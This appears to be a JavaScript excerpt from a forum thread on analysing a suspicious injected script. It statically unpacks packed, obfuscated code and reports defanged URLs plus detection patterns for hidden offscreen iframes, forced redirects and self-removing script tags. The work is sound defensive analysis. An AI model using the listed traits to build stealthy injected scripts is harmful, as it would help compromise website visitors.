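function unescapeLiteral(s) {
  const named = { n: '\n', r: '\r', t: '\t' };
  return s.replace(/\\([\s\S])/g, (_, ch) => named[ch] ?? ch);
}

// The packer's index-to-token encoding: digits 0-9, a-z, then A-Z.
function token(n, base) {
  const digit = n % base;
  const head = n < base ? '' : token(Math.floor(n / base), base);
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Returns the expanded source, or null when the wrapper is not recognised.
function unpackStatic(source) {
  const m = PACKED_RE.exec(source);
  if (!m) return null;
  const base = Number(m[2]);
  const count = Number(m[3]);
  if (base < 2 || base > 62 || count > 100000) return null; // refuse odd input
  const words = unescapeLiteral(m[4]).split('|');
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const t = token(i, base);
    dict.set(t, words[i] || t); // an empty entry means the word is its own token
  }
  // A replacer function keeps '$' in dictionary words from being interpreted.
  return unescapeLiteral(m[1]).replace(/\b\w+\b/g, (w) => dict.get(w) ?? w);
}

// Traits of the script discussed in this thread, reported without running it.
function extractIndicators(code) {
  const urls = [...new Set(code.match(/https?:\/\/[^\s"'\\<>]+/gi) || [])]
    .map((u) => u.replace(/^http/i, 'hxxp')); // defanged for reports
  return {
    urls,
    offscreenIframe: /<iframe\b/i.test(code) &&
      /position\s*:\s*absolute[^>]*?(?:left|top)\s*:\s*-\d{3,}px/i.test(code),
    navigates: /\blocation\s*(?:=[^=]|\.replace\s*\()/.test(code),
    removesItself: /\.outerHTML\s*=\s*(?:""|'')/.test(code),
  };
}

const unpacked = unpackStatic(SAMPLE);
console.log(unpacked);
console.log(extractIndicators(unpacked));
```

Run with Node.js; feeding it the full contents of a suspicious `<script>` block as a string gives the expanded source and the indicator summary without the script ever executing.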